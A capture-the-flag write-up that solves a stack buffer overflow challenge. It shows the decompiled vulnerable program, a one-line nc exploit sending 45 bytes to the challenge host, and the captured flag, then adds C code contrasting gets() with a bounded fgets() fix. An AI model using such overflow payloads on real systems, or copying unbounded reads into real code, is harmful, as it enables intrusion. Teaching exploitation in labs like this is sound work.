pwn intended 0x1
The main idea behind finding the flag is a buffer overflow.
Step-1:
I reversed the file with Ghidra.
```c
/* Ghidra decompilation of main(). The includes and the undefined8 typedef are
 * added so the listing compiles as-is; gets() is the intended bug. */
#include <stdio.h>
#include <stdlib.h>

typedef unsigned long long undefined8;

undefined8 main(void)
{
  char local_38 [44];   /* 44-byte input buffer (stack offset -0x38) */
  int local_c;          /* guard (stack offset -0xc), directly after the buffer */

  local_c = 0;
  setbuf(stdout,(char *)0x0);
  setbuf(stdin,(char *)0x0);
  setbuf(stderr,(char *)0x0);
  puts("Please pour me some coffee:");
  gets(local_38);       /* no length check: bytes past the 44th land in local_c */
  puts("\nThanks!\n");
  if (local_c != 0) {
    puts("Oh no, you spilled some coffee on the floor! Use the flag to clean it.");
    system("cat flag.txt");
  }
  return 0;
}
```
Step-2:
Clearly, this was a case of buffer overflow: `local_c` sits on the stack right after the 44-byte `local_38`, and `gets()` writes without any length check, so a single byte past the end of the buffer is enough to make `local_c` non-zero.
A simple command to overflow the buffer would give us the flag:

```sh
python -c 'print"A"*45' | nc chall.csivit.com 30001
```

Piping the other way round does not help, though.
Output:

```text
Please pour me some coffee:

Thanks!

Oh no, you spilled some coffee on the floor! Use the flag to clean it.
csictf{y0u_ov3rfl0w3d_th@t_c0ff33_l1ke_@_buff3r}
```
Voila! There we have our flag.
Step-3:
Finally the flag becomes:
csictf{y0u_ov3rfl0w3d_th@t_c0ff33_l1ke_@_buff3r}
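As an added example (not part of the original writeup or the challenge binary), the C below reproduces the decompiled stack layout in a struct and contrasts an unbounded `gets()`-style read with the `fgets()` fix a defender would apply; the struct, the function names and the constructed line of 45 `A`s are assumptions made here, and a temp file stands in for stdin.

```c
#include <stdio.h>

/* Same layout as the decompilation: a 44-byte buffer (local_38) directly
 * followed by the guard integer (local_c) that selects the flag branch. */
struct coffee_frame {
    char buf[44];
    int guard;
};

/* Models gets(local_38): copies until newline/EOF with no bound, so bytes past
 * index 43 spill into `guard`. Writes are capped at the struct size so the
 * example itself stays well-defined. */
static int pour_with_gets_like_read(FILE *in) {
    struct coffee_frame f = { {0}, 0 };
    unsigned char *p = (unsigned char *)&f;
    size_t i = 0;
    int c;
    while ((c = fgetc(in)) != EOF && c != '\n' && i < sizeof f)
        p[i++] = (unsigned char)c;
    if (i < sizeof f)
        p[i] = '\0';          /* gets() puts the terminator where input ends */
    return f.guard != 0;      /* 1 => the system("cat flag.txt") branch runs */
}

/* Hardened: fgets() bounded by the buffer's real size can never reach `guard`. */
static int pour_with_fgets(FILE *in) {
    struct coffee_frame f = { {0}, 0 };
    if (fgets(f.buf, sizeof f.buf, in) == NULL)
        return 0;
    return f.guard != 0;
}

/* Feeds n constructed 'A's plus newline to a reader via a temp file (stand-in
 * for stdin); returns 1 = guard clobbered, 0 = guard intact, -1 = error. */
static int guard_clobbered_after(int (*reader)(FILE *), size_t n) {
    FILE *in = tmpfile();
    if (!in)
        return -1;
    for (size_t k = 0; k < n; k++)
        fputc('A', in);
    fputc('\n', in);
    rewind(in);
    int r = reader(in);
    fclose(in);
    return r;
}

int main(void) {
    printf("gets-like read, 45 x 'A': guard clobbered = %d\n", guard_clobbered_after(pour_with_gets_like_read, 45));
    printf("fgets read,     45 x 'A': guard clobbered = %d\n", guard_clobbered_after(pour_with_fgets, 45));
    return 0;
}
```

With 44 bytes the `gets()`-style read still leaves the guard at zero, which is why the writeup's payload needs exactly one byte more than the buffer.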